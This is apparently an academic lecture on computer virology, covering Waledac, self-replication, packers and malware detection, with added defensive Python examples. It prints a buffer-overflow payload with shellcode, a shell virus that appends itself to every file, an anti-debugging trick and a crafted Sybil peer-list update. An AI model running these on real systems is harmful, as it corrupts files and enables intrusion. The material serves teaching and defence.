An introduction to Computer Virology


1 An introduction to Computer Virology. Jean-Yves Marion, LORIA, Université de Nancy

2 Some great stories!? Waledac, Stuxnet, GhostNet

3 What is malware? Malware is a program with malicious intentions: a virus, a worm, spyware, a botnet... Giving a mathematical definition is difficult. So how does it work?

4 How do infections by malware work? Two entry points, social engineering ("you can't patch stupidity") and vulnerabilities ("bugs are unavoidable"), lead to infections, which are followed by mutations.

5 A case study: Waledac. Waledac is a botnet; its goal is to send spam.

6 Excerpt from the report "Infiltrating WALEDAC Botnet's Covert Operations: Effective Social Engineering, Encrypted HTTP2P Communications, and Fast-Fluxing Networks": "... and other similar sexual-enhancement drugs. However, there are times when WALEDAC spews out spam that is neither pharmaceutical in nature nor carries other malware. This suggests that it may have been hired by third parties or clients as a spamming service. These regular WALEDAC spam runs are also documented in detail in Appendix B. Social engineering tactics: the timeline shown in Figure 2 summarizes the WALEDAC activities seen so far. When this report was written, WALEDAC was seen to have used eight social attacks in an effort to make would-be victims run the malware, starting with the Christmas e-card ploy. With the U.S. presidential election flurry coming to a crescendo in January 2009, WALEDAC started sending out spam for its new campaign. The campaign then carried the bad news that Obama refused to be the next president." Figures reproduced on the slide: Figure 1, Christmas e-card spam; Figure 2, Christmas e-card website; Figure 2, timeline of WALEDAC activities; Figure 5, WALEDAC carrying the news that Obama refuses to be the next U.S. president; Figure 6, WALEDAC rips text off Obama's website, bearing false news that he no longer wants to be the president.

7 Waledac: use of a dropper (Conficker or other malware are used to install Waledac); binaries are packed with UPX and home-made packers; encryption technologies: RSA & AES (OpenSSL); sends e-mails from templates; scans files to find e-mail addresses and passwords; downloads binaries and updates itself.

8 An e-mail template (the %^...^% fields are filled in by the bot):

    Received: from %^C0%^P%^R3-6^ %:qwertyuiopasdfghjklzxcvbnm^%^% ([%^C6%^I^%.%^I^%.%^I^%.%^I^%^%]) by %^A^% with Microsoft SMTPSVC(%^Fsvcver^%); %^D^%
    From: "%^Fmynames^% %^Fsurnames^%"
    User-Agent: Thunderbird %^Ftrunver^%
    To: %^0^%
    Subject: %^Fjuly^%
    %^Fjuly_link^%/^%

9 Packer codes: two different versions obtained after a few hours.

10 3-tier movie of an attack: social engineering (targeted attack), then a dropper (client-side exploit), then installation of the malware.

11 Software bugs

12 Software bugs (client-side exploit). Data are programs. Bugs are doors if they are exploitable (0-days). A bug-free system is safe, but systems contain bugs... and bug-free programs do not exist, as a consequence of the undecidability of the halting problem (Turing).

13 Vulnerabilities: a buffer overflow.

    void vulnerable(char *user_data) {
        char buffer[4];
        strcpy(buffer, user_data);   /* no bounds check: user_data overruns the 4-byte buffer */
    }

The call on the slide is vulnerable("aaaaaaaaaaaaaaaa\xec\xf2\xff\xbf" followed by a long NOP sled of \x90 bytes and the shellcode \xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/ls). Stack diagram: buffer, then the saved EBP, then the saved EIP (\xfff0 / \xe000 on the slide), then the \x90\x90... sled.

14 Vulnerabilities: a buffer overflow (continued). The same vulnerable function; the overwritten saved EIP makes the function return at the address FFF0, inside the \x90\x90 sled on the stack (diagram: EIP, EBP, buffer, stack).

15 Bugs. A buffer overflow transforms a program into a self-modifying program: wave 1 is the original code; wave 2 is the code created by the buffer overflow in wave 1.

16 What is malware? (1/3) It infects systems by self-replication; it mutates; it protects itself (obfuscation, self-modification); its detection is undecidable.

17 Outline: Foundation 1: self-replication; Foundation 2: self-modification; Detection (detection by string matching, behavioral detection); Botnet neutralization.

18 Foundation 1: Self-replication

19 Self-replicating cellular automata: Von Neumann (1952), Burks, Codd, Langton.

20 Cohen's formalization (1985). Cohen's virus (1985): v1 v2 ... vn produces v'1 v'2 ... v'm. Consider a Turing machine M and a viral set V. When the TM M reads v ∈ V, M produces v' ∈ V. (M, V) is a description of a virus.

21 Self-replication. A virus has self-replicating capacity, a reflexive property of the programming language based on a pointer mechanism to the program code, e.g. $0 in the shell:

    # for each file FName in the current path
    for FName in *; do
        # if FName is not me
        if [ "$FName" != "$0" ]; then
            # add myself at the end of FName
            cat "$0" >> "$FName"
        fi
    done

Figure 2: an example of ecto-symbiote. We see that by iterating this virus, it will make copies of itself until the system runs out of memory.

22 Self-replication: program encoding (Ken Thompson, «Reflections on Trusting Trust», CACM 1984). The program below prints its own source, including the #include line (34 is the ASCII code of the double quote, 10 of the newline):

    #include <stdio.h>
    int main(void) { char *s="#include <stdio.h>%cint main(void) { char *s=%c%s%c; printf(s,10,34,s,34,10); return 0; }%c"; printf(s,10,34,s,34,10); return 0; }

See also quines.

23 Self-replication: fixed-point combinators (functional programming languages): Y F = F (Y F). Computability: the recursion theorem of Kleene (1938). See the book of N. D. Jones for a programming point of view; the books of Rogers or P. Odifreddi for a computability point of view; and the marvelous books of R. Smullyan...

24 A compilation point of view. A worm X scenario: an attachment is opened by social engineering; X scans for information; X extracts a list of addresses of targeted people; X sends a copy of itself by e-mail.

25 Worm X specification (pseudocode):

    WormX(v, out) {
        info := extract(out);               // extract information
        out  := send(info, out);            // send information
        addr := findaddress(out);           // find addresses
        out  := send(cons(v, addr), out);   // send worm X
    }

How to compile Worm X?

26 Program semantics. ⟦P⟧(d) is the value of P on the environment d; ⟦_⟧ : Programs → D → D, where a value of D is a system environment. From the above example: ⟦Hello⟧(Out), where Out is an output stream.

27 Suppose that out is a system entry point. A specification of ILoveYou is:

    love(v, out) {
        info := find(out);                  // find information
        out  := send(info, out);            // send information
        addr := extract(out);               // extract addresses
        out  := send(cons(v, addr), out);   // send virus
        return out;
    }

Solve a fixed-point equation. We have to solve a fixed-point equation: v should behave as ILoveYou if W(out) = WormX(W, out), where W is a worm satisfying the specification WormX.

28 A general solution to fixed-point equations is given by Kleene's recursion theorem. Theorem (Kleene, 1938): if p is a program, then there is a program e such that ⟦e⟧(x) = ⟦p⟧(e, x). A solution of the ILoveYou equation ⟦v⟧(out) = ⟦love⟧(v, out): set v = e where p = love. Proof: let d(x)(y) = x(x, y) and q(y, x) = p(d(y), x); set e = d(q). Then d(q)(x) = q(q, x) = p(d(q), x), i.e. e(x) = p(e, x).
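The diagonal construction of slides 22 to 28 (d, q and e = d(q)) carried out as running code. This is an added example, not code from the slides: programs are Python source strings exposing a main function, and the specification p(e, x) is a harmless one (a program that reports its own length, and a second one whose fixed point is a quine in the sense of slide 22), so the same construction that slide 28 applies to the love specification is exercised on inputs that do nothing but compute. PRELUDE, run, d and build_fixed_point are names chosen here.

```python
"""Kleene's recursion theorem as an executable construction (added example).

A program is a Python source string that defines ``main``. Given a
specification p(e, x), we build e with e(x) == p(e, x) by the construction on
slide 28: d(x)(y) = x(x, y), q(y, x) = p(d(y), x), e = d(q).
"""

# Toolkit carried by every generated program: ``run`` executes program text,
# ``d`` is the diagonal program constructor (names chosen for this example).
PRELUDE = '''\
def run(src, *args):
    """Execute program text ``src`` and call its main on ``args``."""
    ns = {"PRELUDE": PRELUDE}
    exec(src, ns)
    return ns["main"](*args)

def d(x_src):
    """d(x): the program  y -> x(x, y)  (x applied to its own text)."""
    return PRELUDE + "X = " + repr(x_src) + "\\ndef main(y):\\n    return run(X, X, y)\\n"
'''

_ns = {"PRELUDE": PRELUDE}
exec(PRELUDE, _ns)
run, d = _ns["run"], _ns["d"]


def build_fixed_point(p_src: str) -> str:
    """Return program text e such that run(e, x) == run(p_src, e, x) for every x."""
    # q(y, x) = p(d(y), x): q receives a program text y and applies p to d(y)
    q_src = PRELUDE + "P = " + repr(p_src) + "\ndef main(y, x):\n    return run(P, d(y), x)\n"
    # e = d(q), hence e(x) = q(q, x) = p(d(q), x) = p(e, x)
    return d(q_src)


# Specification 1 (constructed): a program that knows its own size, p(e, x) = len(e) + x.
SPEC_LENGTH = "def main(e, x):\n    return len(e) + x\n"

# Specification 2 (constructed): p(e, x) = e, whose fixed point prints itself (a quine).
SPEC_QUINE = "def main(e, x):\n    return e\n"


def demo():
    """Check both fixed points against their specifications."""
    e1 = build_fixed_point(SPEC_LENGTH)
    e2 = build_fixed_point(SPEC_QUINE)
    return run(e1, 5) == len(e1) + 5, run(e2, None) == e2


if __name__ == "__main__":
    print(demo())  # (True, True)
```

The point to notice is that build_fixed_point never inspects p: any specification that takes its own text as first argument gets a program satisfying it, which is exactly why the theorem yields a "compiler" for self-replicating specifications on the slides that follow, and why detection cannot rely on any particular way of writing the replication.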

29 Malware construction from a specification. With out a system entry point and the specification love(v, out) of slide 27, Kleene's recursion theorem gives a program e with ⟦e⟧(x) = ⟦p⟧(e, x); the Kleene fixed point is a solution of ⟦v⟧(out) = ⟦love⟧(v, out) when we set v = e with p = love. We can construct a virus which satisfies a given specification.

30 Self-replicating malware compiler. There is a compiler Comp such that, for a specification Worm, Comp(Worm) = W where W is the worm satisfying the specification: W(out) = Worm(W, out).

31 Self-replication with mutations. We can generate malware which satisfies the specification Worm and mutates at each execution automatically: e(out) = Worm(Mutate(e), out), where Mutate is a code mutation procedure. The construction of e is given by Kleene's theorem. Some historical facts: 1983, the first official virus on Vax-PDP; the first worm, which infects 6000 machines; 1990, the Dark Avenger mutation engine (Bulgaria); 1995, macro viruses; 2000, the worm I Love You; 2001, the Palm Pilot virus.

32 Self-replicating compiler with mutations. There is a compiler Comp such that, for every worm specification Worm and mutation procedure Mutate, Comp(Worm) = W with W(out) = Worm(Mutate(W), out).

33 References: the PhD thesis of F. Cohen; L. Adleman (1988), which coins the word «virus»; Guillaume Bonfante, Matthieu Kaczmarek, Jean-Yves Marion: On Abstract Computer Virology from a Recursion Theoretic Perspective, Journal in Computer Virology (3-4), 2006; "A virus is a virus", Lwoff.

34 Foundation 2: Self-modification

35 Data is code. Today's computers are built from two key principles: 1) instructions are represented as numbers; 2) programs can be stored in memory to be read or written just as numbers (Patterson & Hennessy).

36 Applications of self-modifying programs: malware mutations; code protection (digital rights); compression and packers; just-in-time compilers.

37 A simple self-modification: a simple decryption loop (wave 1 decrypts and produces wave 2).

38 Example: the packer UPX. UPX (packer) applied to Hello.exe: wave 1 is the packed binary, wave 2 the unpacked code it produces.

39 Another example of self-modification: Proxy = { x := Read(); eval(x); }. An external input is run: an interpreter of a known or unknown language is used to execute some data.

40 Analyzing self-modifying programs: complex to design and to analyze, since the program flow may change. The usual setting in semantics is that program and data are separated, and the semantics is defined by structural induction on P: ⟦P⟧(σ) = σ'.

41 Dynamic analysis of self-modifying programs: instrument a program; monitor read (R) and write (W) memory accesses and memory execution (X); we follow nested self-modifying code; we detect some code protections; we detect code patterns: code decryption, integrity checking...

42 Example (3/5): ACProtect. hostname packed with ACProtect.

43 Example (4/5): Themida. hostname packed with Themida.

44 Experiments with TraceSurfer (experimental results 1/3). TraceSurfer is based on Pin (Intel). Number of code waves detected over the whole set of binaries: max 56 waves. Binaries: 80% of success, 1400 binaries/h.

45 Related work: TraceSurfer, based on Pin (Intel); BitBlaze (Berkeley): TEMU, Vine, ...; DynamoRIO, Ether, Metasm; data-tainting related methods.

46 Malware detection 46

47 Malware detection by string scanning. A signature is a regular expression denoting a sequence of bytes. Worm.Y: "Your mac is now under our control!" and Worm.Y: "Your PC is now under our control!" share the signature «Your * is now under our control».

48 Malware detection by string scanning. A signature is a regular expression denoting a sequence of bytes; detection relies on a database of known signatures. Background from Filiol's article on computer viruses (in French on the slide): in dynamic mode the antivirus is resident and monitors the activity of the operating system, the network and the user; it takes control before any action and tries to determine whether that action carries a viral risk. This mode is demanding in resources and needs relatively powerful machines, otherwise the user (as is too often seen) disables it. The most effective modern antivirus products combine several techniques (programmed in modules, the engines) to reduce the risk to a minimum; they fall into two groups. Form analysis, commonly called signature search (an improper name, since it covers only a very restricted approach of form analysis, which groups many techniques), analyses a code seen as a sequence of bits or bytes, outside any execution context. It rests on the notion of a detection scheme (chapter 2 of [9]) = {M, f}, made of a detection pattern M (relative to a malicious code) and a detection function f: one searches, in different ways characterised by the detection function and relative to one or more databases (sets of detection schemes), for strings of bits or bytes of more or less complex structure, recorded in those databases as characteristic of a given malicious code. Behavioural analysis, where an executable file is analysed in its execution context, is a functional detection: the behaviours or actions of the code are studied, and detection is then based on the notion of a detection strategy [9] (Definition 5: a detection strategy relative to a malicious code is a triple whose last component is the detection function f).

Example (Filiol, Table 1, detection pattern of I-Worm.Bagle.P): signature size in bytes and signature indices per product. Avast: 8 bytes (offsets 12,916–12,919 and 12,937–12,940). AVG: 14. BitDefender: 8. Dr Web: 6. eTrust/Vet: 1. KAV Pro: 59 (identical to F-Secure 2005). NOD32: 21. Sophos: 8. Also listed: eTrust/InoculateIT, F-Secure 2005, G-Data, McAfee, Norton 2005, Panda Titanium, Trend OfficeScan. Consider the detection of a recent and well-known worm, Bagle.P: the list of the different detection patterns is given in Table 1, and the detection function is the logical AND, so that all of a product's patterns must match for the worm to be detected. Source: Filiol.

49 Malware detection by string scanning. Pros: accuracy (low rate of false positives: programs which are not malware are not detected); efficiency (fast string-matching algorithms: Karp & Rabin, Knuth, Morris & Pratt, Boyer & Moore). Cons: signatures are quasi-manually constructed; the method is vulnerable to malware protections, mutations and code obfuscations.
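String scanning as slides 47 to 49 describe it, as an added example that is not from the slides: a small signature database of byte regular expressions (the slide's «Your * is now under our control» pattern plus a byte pattern taken from the shellcode prologue of slide 13), a scanner, and constructed samples. The last sample stores the message XOR-encoded and would decode it only at run time, which is the "mutations and obfuscations" weakness of the Cons list: the signature is simply absent from the file. Sample bytes, names and the XOR key are all made up for this example.

```python
import re

# Constructed signature database: name -> regular expression over bytes.
SIGNATURES = {
    # slide 47: «Your * is now under our control», with a bounded wildcard
    "Worm.Y": re.compile(rb"Your [^\n]{1,16}? is now under our control"),
    # first six bytes of the shellcode shown on slide 13 (jmp / call / pop idiom)
    "Shellcode.JmpCallPop": re.compile(rb"\xeb\x1f\x5e\x89\x76\x08"),
}


def scan(sample: bytes) -> list:
    """Return [(signature name, offset of first match)] for every signature that matches."""
    hits = []
    for name, pattern in SIGNATURES.items():
        match = pattern.search(sample)
        if match is not None:
            hits.append((name, match.start()))
    return hits


def xor_bytes(data: bytes, key: int) -> bytes:
    """Single-byte XOR, used here only to build the obfuscated sample."""
    return bytes(b ^ key for b in data)


# Constructed samples: a 16-byte stand-in for an executable header, then content.
HEADER = b"MZ" + b"\x00" * 14
SAMPLE_MAC = HEADER + b"Your mac is now under our control!"
SAMPLE_PC = HEADER + b"\x90" * 8 + b"\xeb\x1f\x5e\x89\x76\x08" + b"Your PC is now under our control!"
SAMPLE_CLEAN = HEADER + b"Hello, world!"
# Mutated variant: the message is XOR-encoded (key 0x2A, arbitrary) inside the
# file and never appears in clear, so the string signature cannot fire.
SAMPLE_MUTATED = HEADER + xor_bytes(b"Your PC is now under our control!", 0x2A)


def demo() -> dict:
    """Scan every constructed sample and report the hits."""
    return {
        "mac": scan(SAMPLE_MAC),            # [("Worm.Y", 16)]
        "pc": scan(SAMPLE_PC),              # [("Worm.Y", 30), ("Shellcode.JmpCallPop", 24)]
        "clean": scan(SAMPLE_CLEAN),        # []
        "mutated": scan(SAMPLE_MUTATED),    # []  -> a false negative
    }


if __name__ == "__main__":
    for label, hits in demo().items():
        print(f"{label:8s} {hits}")
```

The regular-expression engine stands in for the dedicated string-matching algorithms the slide cites; the accuracy claim (a clean file is not flagged) and the weakness (a trivially re-encoded variant is missed) both show up in the output.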

50 Detection by integrity check: identify a file using a hash function (files → hash function → hash numbers, the numerical fingerprints). Cons: file systems are updated, so numerical fingerprints change, which is difficult to maintain in practice; files may change while keeping the same numerical fingerprint (due to the hash function).
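An integrity checker of the kind slide 50 describes, written here as an added example (not code from the slides): a baseline of SHA-256 fingerprints over a snapshot of files, then a verification pass that classifies every path. The constructed "day 1" snapshot contains both an infected binary and a legitimate administrator edit; the checker reports them identically, which is the maintenance problem the slide's Cons list points at. Paths and contents are made up.

```python
import hashlib


def fingerprint(content: bytes) -> str:
    """Numerical fingerprint of a file: its SHA-256 digest in hex."""
    return hashlib.sha256(content).hexdigest()


def baseline(files: dict) -> dict:
    """Fingerprint every file of a snapshot {path: content}."""
    return {path: fingerprint(data) for path, data in files.items()}


def verify(files: dict, base: dict) -> dict:
    """Compare a snapshot with a baseline; each path gets ok/modified/added/missing."""
    report = {}
    for path, data in files.items():
        if path not in base:
            report[path] = "added"
        elif base[path] != fingerprint(data):
            report[path] = "modified"
        else:
            report[path] = "ok"
    for path in base:
        if path not in files:
            report[path] = "missing"
    return report


# Constructed file-system snapshot taken when the baseline is built.
DAY_0 = {
    "bin/ls": b"\x7fELF...ls",
    "bin/cat": b"\x7fELF...cat",
    "etc/motd": b"Welcome\n",
}


def day_1() -> dict:
    """The same system one day later (constructed): one infection, one admin change."""
    fs = dict(DAY_0)
    fs["bin/ls"] = fs["bin/ls"] + b"\x90\x90virus"   # infected: code appended to the binary
    fs["etc/motd"] = b"Welcome, patched\n"          # legitimate edit by the administrator
    fs["bin/new"] = b"\x7fELF...new"                # freshly installed program
    del fs["bin/cat"]                                # removed program
    return fs


def demo() -> dict:
    """Report of day 1 against the day 0 baseline."""
    return verify(day_1(), baseline(DAY_0))


if __name__ == "__main__":
    for path, status in sorted(demo().items()):
        print(f"{status:9s} {path}")
```

Both bin/ls and etc/motd come back as "modified": the checker sees a change, not an intent, so every legitimate update forces a new baseline. The second Con (a changed file with an unchanged fingerprint) is a collision of the hash function and does not occur with SHA-256 in practice, but it is why the choice of hash matters.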

51 Behavioral analysis: trace automata. Monitor program interactions (system calls, network calls, ...); behavior patterns; abstracting by reduction; detection of program behavior from execution traces. The trace language of a program is generally undecidable; it is approximated by a regular language, using trace collection or static analysis: a trace automaton is a finite-state approximation of some trace language. Functionalities are expressed at a high level, e.g. the call sequence IcmpSendEcho, GetDriveType, FindFirstFile, FindNextFile, GetLogicalDriveStrings, GetDriveType, FindFirstFile, FindFirstFile, FindNextFile, FindNextFile. Information leaks can be detected. Cons: today behavioral analysis is dynamic, which implies monitoring all processes or running programs in sandboxes; it slows down the system.
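A trace abstraction and two behaviour patterns in the spirit of slide 51, as an added example that is not from the slides. Each monitored API call is abstracted to one symbol of a small alphabet, and a behaviour pattern is a regular language over that alphabet, i.e. a trace automaton; matching is done by the regular-expression engine. The alphabet, the patterns and the sample traces are constructed for this example (the call names are the ones listed on the slide plus a few common ones); "info-leak" is the order-sensitive pattern the slide mentions: a local read followed, later, by network activity.

```python
import re

# Abstraction: API call -> symbol. Calls outside the alphabet become '.', which
# keeps their position in the trace but carries no behaviour.
ALPHABET = {
    "GetLogicalDriveStrings": "D", "GetDriveType": "D",   # drive enumeration
    "FindFirstFile": "F", "FindNextFile": "F",            # directory walk
    "CreateFile": "O", "ReadFile": "R",                   # local data access
    "IcmpSendEcho": "N", "send": "N", "InternetOpenUrl": "N",  # network
}

# Behaviour patterns as regular languages over the alphabet (trace automata).
PATTERNS = {
    "drive-scan": re.compile(r"D+.*F{2,}"),   # enumerate drives, then walk files
    "info-leak": re.compile(r"R.*N"),         # read local data, then talk to the network
}


def abstract(trace: list) -> str:
    """Reduce a list of API call names to a word over the abstract alphabet."""
    return "".join(ALPHABET.get(call, ".") for call in trace)


def detect(trace: list) -> list:
    """Names of the behaviour patterns whose automaton accepts a factor of the trace."""
    word = abstract(trace)
    return [name for name, pattern in PATTERNS.items() if pattern.search(word)]


# Constructed traces.
SCAN_TRACE = ["GetLogicalDriveStrings", "GetDriveType", "FindFirstFile", "FindNextFile",
              "FindNextFile", "CreateFile", "ReadFile", "send"]
BENIGN_TRACE = ["CreateFile", "ReadFile", "WriteFile", "CloseHandle"]
DOWNLOAD_TRACE = ["InternetOpenUrl", "CreateFile", "ReadFile"]   # network first: no leak


def demo() -> dict:
    return {
        "scan": detect(SCAN_TRACE),          # ['drive-scan', 'info-leak']
        "benign": detect(BENIGN_TRACE),      # []
        "download": detect(DOWNLOAD_TRACE),  # []
    }


if __name__ == "__main__":
    print(abstract(SCAN_TRACE), demo())
```

Because the pattern is a regular language and not the program's actual trace language, the automaton over-approximates: any trace with a read somewhere before a send is flagged, which is the trade-off the slide states between decidability and precision.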

52 Code protection. Detection is hard because malware are protected: 1. obfuscation; 2. cryptography; 3. self-modification; 4. anti-analysis tricks.

53 Protections: self-modification and obfuscation. A lot of malware families use home-made obfuscations, like packers, to protect their binaries, following a standard model. The obfuscation mechanism is automatically modified for each new distributed binary. For a human analyst, it is very hard to understand an obfuscated code.

54 Win32.Swizzor packer (figure).

55 Protections: self-modification and obfuscation. A lot of malware families use home-made obfuscations, like packers, to protect their binaries, following a standard model. The obfuscation mechanism is automatically modified for each new distributed binary. For a human analyst, it is very hard to understand an obfuscated code, because not all the code lines are meaningful and because x86 semantics is very tricky. One problem is the absence of a high-level abstraction to structure and understand obfuscated codes.

56 Code protection. Detection is hard because malware are protected. Some interesting protection methods: 1. obfuscation; 2. cryptography; 3. self-modification; 4. anti-analysis tricks.

57 Obfuscation: function calls. A function has a purpose; the divide-and-conquer approach works by understanding function purposes, a higher degree of abstraction. There are a lot, a lot of other obfuscation methods...

58 Obfuscation: but in the malware world, what is the purpose of a function call?

59 Code protection: 1. obfuscation; 2. cryptography; 3. self-modification; 4. anti-analysis tricks.

60 Cryptography: the dropper of the Agobot botnet.


63 Code protection: 1. obfuscation; 2. cryptography; 3. self-modification; 4. anti-analysis tricks.

64 Self-modification: packers... already seen previously.

65 Code protection: 1. obfuscation; 2. cryptography; 3. self-modification; 4. anti-analysis tricks.

66 Anti-debugging tricks.

    MOV EAX, -1
    INT 2E
    CMP WORD PTR DS:[EDX-2], 2ECD

Call interrupt 2E with an invalid EAX value. Normal behavior: EDX contains the address of the next instruction. Test whether EDX-2 points to the opcode of INT 2E, which is 2ECD. If a debugger is running, then EDX is equal to 0xFFFFFFFF.

67 Consequences of code protection: 1. it is difficult for a human analyst to understand a malware code (1. OllyDbg, 2. IDA Pro).

68 Welcome to Swizzorland!!!

69 Consequences of code protection: 1. it is difficult for a human analyst to understand a malware code (1. OllyDbg, 2. IDA Pro); 2. it is difficult to design automatic tools (1. static analysis, abstract interpretation; 2. dynamic analysis).


71 A cruel world. Theorem: let v be a virus; the set of viruses which are obtained from v by mutation is not decidable (computable). This is a consequence of Rice's theorem. Theorem (Rice): let P be a non-trivial computable property; then the set of programs which satisfy P is not decidable. Idea of the proof: construct a reduction from the halting problem.

72 Morphological analysis in a nutshell: signatures are abstract flow graphs; detection is the search for a subgraph in the abstraction of the program flow graph.

73 Automatic construction of signatures.

74 Reduction of signatures by graph rewriting.

75 Morphological detection: results. False negatives: no experiment on unknown malware; signatures with fewer than 18 nodes are potential false negatives; restricted signatures of 20 nodes are efficient. Less than 3 s for signatures of 500 nodes.

76 Conclusion about morphological detection: benchmarks are good. Pros: more robust to local mutation and obfuscation; detects easily variants of the same malware family; tries to take program semantics into account; quasi-automatic generation of signatures. Cons: it is difficult to determine the flow graph of self-modifying programs statically, hence the use of a combination of static and dynamic analysis.
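Slides 72 to 76 in miniature, as an added example that is not the detector's code: a flow graph is a dictionary node → (label, successors); the rewriting rule erases plain-instruction nodes so that only the flow-shaping instructions remain (the reduction of slide 74), and detection is a backtracking search for the signature graph inside the reduced program graph (slide 72). The signature is a loop "conditional jump, call, jump back"; the program is a variant of it with junk instructions inserted, the local mutation of slide 76. Labels, graphs and the reduction rule are constructed for this example and simpler than the published detector.

```python
# Flow graphs: node -> (label, [successors]). Labels: 'inst' (plain instruction,
# no flow information) and the flow-shaping 'jmp', 'jcc', 'call', 'ret'.


def reduce_graph(g: dict) -> dict:
    """Graph rewriting: erase every 'inst' node, wiring its predecessors to its successor."""
    g = {n: (lab, list(succ)) for n, (lab, succ) in g.items()}
    while True:
        victim = next((n for n, (lab, succ) in g.items()
                       if lab == "inst" and len(succ) == 1 and succ[0] != n), None)
        if victim is None:
            return g
        target = g[victim][1][0]
        for m, (lab, succ) in g.items():
            g[m] = (lab, [target if s == victim else s for s in succ])
        del g[victim]


def find_signature(sig: dict, prog: dict):
    """Label-preserving injective mapping of sig into prog such that every edge of
    sig is an edge of prog (subgraph search by backtracking); None if absent."""
    order = list(sig)

    def consistent(mapping):
        for s, p in mapping.items():
            for t in sig[s][1]:
                if t in mapping and mapping[t] not in prog[p][1]:
                    return False
        return True

    def extend(i, mapping):
        if i == len(order):
            return dict(mapping)
        s = order[i]
        for p, (lab, _) in prog.items():
            if lab != sig[s][0] or p in mapping.values():
                continue
            mapping[s] = p
            if consistent(mapping):
                found = extend(i + 1, mapping)
                if found is not None:
                    return found
            del mapping[s]
        return None

    return extend(0, {})


# Constructed signature: a loop of the shape  jcc -> call -> jmp back to the jcc.
SIGNATURE = {
    "a": ("jcc", ["b", "c"]),
    "b": ("call", ["d"]),
    "d": ("jmp", ["a"]),
    "c": ("ret", []),
}

# Constructed variant: the same loop with junk instructions inserted between the
# flow-shaping instructions (a local mutation).
VARIANT = {
    "n0": ("inst", ["n1"]),
    "n1": ("jcc", ["n2", "n6"]),
    "n2": ("inst", ["n3"]),
    "n3": ("inst", ["n4"]),
    "n4": ("call", ["n5"]),
    "n5": ("jmp", ["n1"]),
    "n6": ("inst", ["n7"]),
    "n7": ("ret", []),
}

# Constructed benign program: a single call, no loop.
BENIGN = {
    "m0": ("inst", ["m1"]),
    "m1": ("call", ["m2"]),
    "m2": ("ret", []),
}


def demo() -> tuple:
    """(match after reduction, match without reduction, match on the benign program)."""
    return (find_signature(SIGNATURE, reduce_graph(VARIANT)),
            find_signature(SIGNATURE, VARIANT),
            find_signature(SIGNATURE, reduce_graph(BENIGN)))


if __name__ == "__main__":
    print(demo())
```

Without the reduction the inserted junk breaks the signature's edges and the search fails; after reduction the loop is found again, which is the robustness to local mutation claimed on slide 76. The backtracking search is exponential in the worst case, so the node-count limits reported on slide 75 are not incidental.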

77 Reference: Guillaume Bonfante, Matthieu Kaczmarek and Jean-Yves Marion, Architecture of a malware morphological detector, Journal in Computer Virology, Springer.

78 Waledac, again... How to neutralize a botnet? Send the US Marshals (see the recent Rustock story), or design an attack: a good understanding of the mechanisms of the botnet (reverse engineering), finding an attack, large-scale experiments in vitro.

79 Waledac peer-to-peer communication protocol. Each peer maintains a list of known peers (RLIST). Bots exchange parts of their RLIST on a regular basis to maintain connectivity. A fallback mechanism over HTTP fetches new peers. The list is sorted by local time; the message carries a global timestamp (localtime) and a local timestamp per node, and the node content is the repeater id:

    <lm>
      <localtime> </localtime>
      <nodes>
        <node ip="a.b.c.d" port="80" time=" "> 469abea004710c1ac cef03183 </node>
        <node ip="e.f.g.h" port="80" time=" "> c03424d9f12c17fdf4b640b </node>
        ...
      </nodes>
    </lm>

80 Waledac peer-to-peer communication protocol. Updates are based on the most recent timestamps. An IP address does not identify a peer; the id identifies a peer. Vulnerability to a Sybil attack: craft an RLIST update to put «myip» on the top-500 list:

    <lm><localtime>0</localtime>
      <nodes>
        <node ip="myip" port="80" time="0"> </node>
        ...
        <node ip="myip" port="80" time="0"> </node>
      </nodes>
    </lm>
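The peer-list logic of slides 79 and 80, as an added example that is not Waledac's code: a parser for the <lm> format shown on slide 79, a merge that follows the rule stated on slide 80 (the id identifies a peer, the most recent entry per id wins, the list keeps the freshest peers), and a hardened merge with a per-address cap. The cap is an assumed fix for this example, not something the slides describe, and "time" is read here as an age (0 = freshest), an assumption consistent with the time="0" entries of the crafted update on slide 80. Addresses are documentation ranges and ids are made up.

```python
import xml.etree.ElementTree as ET

# Constructed local RLIST in the <lm> format of slide 79 (ids and addresses made up).
LOCAL_RLIST = """<lm><localtime>0</localtime>
<nodes>
<node ip="192.0.2.10" port="80" time="40">aaaa000000000001</node>
<node ip="198.51.100.5" port="80" time="15">bbbb000000000002</node>
<node ip="192.0.2.11" port="80" time="90">cccc000000000003</node>
</nodes></lm>"""


def parse_rlist(xml_text: str) -> list:
    """Parse an <lm> message into a list of peer records."""
    peers = []
    for node in ET.fromstring(xml_text).iter("node"):
        peers.append({"id": (node.text or "").strip(), "ip": node.get("ip"),
                      "port": int(node.get("port")), "time": int(node.get("time"))})
    return peers


def merge(local: list, update: list, size: int = 500) -> list:
    """Merge rule as slide 80 states it: the id identifies the peer, the freshest
    entry per id wins (smaller age), and only the `size` freshest peers are kept."""
    by_id = {p["id"]: p for p in local}
    for p in update:
        if p["id"] not in by_id or p["time"] < by_id[p["id"]]["time"]:
            by_id[p["id"]] = p
    return sorted(by_id.values(), key=lambda p: p["time"])[:size]


def merge_capped(local: list, update: list, size: int = 500, per_ip: int = 2) -> list:
    """Hardened merge (assumed fix for this example): no address may hold more than
    `per_ip` slots, so fresh ids from a single host cannot crowd out real peers."""
    seen, kept = {}, []
    for p in merge(local, update, size=len(local) + len(update)):
        if seen.get(p["ip"], 0) < per_ip:
            seen[p["ip"]] = seen.get(p["ip"], 0) + 1
            kept.append(p)
        if len(kept) == size:
            break
    return kept


def flood_update(ip: str, count: int) -> list:
    """Update of the shape shown on slide 80: many fresh ids, one address (constructed)."""
    return [{"id": f"sybil{i:011d}", "ip": ip, "port": 80, "time": 0} for i in range(count)]


def demo(size: int = 5) -> tuple:
    """How many slots of a `size`-entry list one address takes, naive vs capped."""
    local = parse_rlist(LOCAL_RLIST)
    flood = flood_update("203.0.113.7", 20)
    naive = merge(local, flood, size=size)
    capped = merge_capped(local, flood, size=size)
    return (sum(p["ip"] == "203.0.113.7" for p in naive),
            sum(p["ip"] == "203.0.113.7" for p in capped),
            len(capped))


if __name__ == "__main__":
    print(demo())  # (5, 2, 5)
```

With the naive rule every slot of the list goes to the flooding address, which is the vulnerability slide 80 names; with the cap it keeps two slots and the three legitimate peers survive. The cap is a coarse defence (a flood from many addresses needs a different answer), but it shows why an identity that costs nothing to mint must not be the only key of a peer table.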

